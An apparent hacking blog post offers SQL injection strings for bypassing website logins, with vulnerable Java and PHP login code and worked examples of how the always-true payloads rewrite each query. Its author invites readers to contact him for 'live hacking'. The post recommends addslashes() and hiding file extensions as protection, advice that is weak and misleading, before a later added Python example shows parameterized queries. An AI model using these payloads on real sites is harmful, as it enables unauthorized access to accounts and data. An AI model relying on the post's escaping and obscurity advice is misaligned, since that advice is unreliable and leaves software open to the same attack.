Here I am posting some of the SQL injection strings that you can use to hack into the website.
I have done some practical work with these; if someone wants to go live hacking using these SQL injection strings, contact me.
This is a short list, but these SQL injection strings are very powerful.
I have another hint:
Some SQL database systems don't accept every one of these strings.
For example:
" or "a"="a
') or ('a'='a
On some databases one would work and the other wouldn't. The first is for a query that encloses the username (or password) in quotes: it first CLOSES the open quote (making it "") and then says or "a"="a. The query's own last quote then closes the final a, and "a"="a" is always true, so that is how it works.
The second is for a query that uses ('Username'), changing it to say ('') or ('a'='a').
Enjoy the HACK DAY 
SQL Injection like this
Login Java Code
String userid = request.getParameter("userid");
String password = request.getParameter("password");
Class.forName("sun.jdbc.odbc.JdbcOdbcDriver");
Connection connection = DriverManager.getConnection("jdbc:odbc:projectDB");
// Vulnerable: the request parameters are concatenated straight into the SQL text
String query = "SELECT * FROM Users WHERE user_id ='" + userid + "' AND password ='" + password + "'";
// prepareStatement() gives no protection here, because the query has no ? placeholders
PreparedStatement ps = connection.prepareStatement(query);
ResultSet users = ps.executeQuery();
if (users.next()) {
    // some thing here
} else {
}
Injection Works like this
query = "SELECT * FROM Users WHERE user_id ='' OR 1=1; /* AND password ='*/--'";
Login PHP Code
$myusername = $_POST['usr'];
$mypassword = $_POST['pwd'];
// Vulnerable: both values are interpolated straight into the SQL string
$sql = "SELECT * FROM users WHERE user='$myusername' and password='$mypassword'";
// The mysql_* functions are deprecated and were removed in PHP 7
$result = mysql_query($sql);
$count = mysql_num_rows($result);
if ($count == 1) {
    // some code
} else {
}
Injection Works like this
Username = ' OR 1=1;//
Password = ....
$sql="SELECT * FROM users WHERE user=''OR 1 = 1;//' and password='....'";
How to avoid these mistakes
Use the addSlashes() function, which adds backslashes (\) to the string, in Java and PHP.
// Java Code
// addSlashes() is not part of the Java standard library; it has to be a helper you write yourself
userid = addSlashes(userid);
// PHP Code
$myusername = addslashes($_POST['usr']);
A hacker is more intelligent than a programmer, so always hide the file extension (e.g. *.jsp, *.php, *.asp):
http://xyz.com/login.php to http://xyz.com/login
http://xyz.com/login to http://xyz.com/signin.do
In Java, redirect these URLs using the web.xml file; in PHP, write a .htaccess file in the root directory.
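An added example, not part of the original post: the login query from above built by string concatenation and again with bound parameters, which keep the input as data instead of relying on escaping. It uses Python's built-in sqlite3 so it runs without a database server; the table rows, the function names and the TAUTOLOGY constant are constructed for illustration.

```python
import sqlite3

def make_db():
    """In-memory table shaped like the page's Users table (rows are constructed).
    Plaintext passwords only mirror the page's schema."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE Users (user_id TEXT PRIMARY KEY, password TEXT)")
    conn.executemany(
        "INSERT INTO Users VALUES (?, ?)",
        [("alice", "correct-horse"), ("o'brien", "s3cret")],
    )
    return conn

def login_concat(conn, userid, password):
    """Same pattern as the page's login code: input is pasted into the SQL text."""
    query = ("SELECT * FROM Users WHERE user_id ='" + userid +
             "' AND password ='" + password + "'")
    return conn.execute(query).fetchone() is not None

def login_bound(conn, userid, password):
    """Placeholders keep the input as data; the SQL text never changes."""
    query = "SELECT * FROM Users WHERE user_id = ? AND password = ?"
    return conn.execute(query, (userid, password)).fetchone() is not None

# Always-true input of the kind the page discusses (single-quote form)
TAUTOLOGY = "' or 'a'='a"

if __name__ == "__main__":
    db = make_db()
    print("concat, tautology :", login_concat(db, TAUTOLOGY, TAUTOLOGY))
    print("bound,  tautology :", login_bound(db, TAUTOLOGY, TAUTOLOGY))
    print("bound,  o'brien   :", login_bound(db, "o'brien", "s3cret"))
    try:
        # A legitimate name containing a quote breaks the concatenated query
        login_concat(db, "o'brien", "s3cret")
    except sqlite3.OperationalError as exc:
        print("concat, o'brien   : query broke ->", exc)
```

In the Java login code the equivalent is a query with ? placeholders filled in through PreparedStatement.setString(); in PHP it is a PDO or mysqli prepared statement.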
By Kaila Piyush
HackingArticles4all.blogspot.com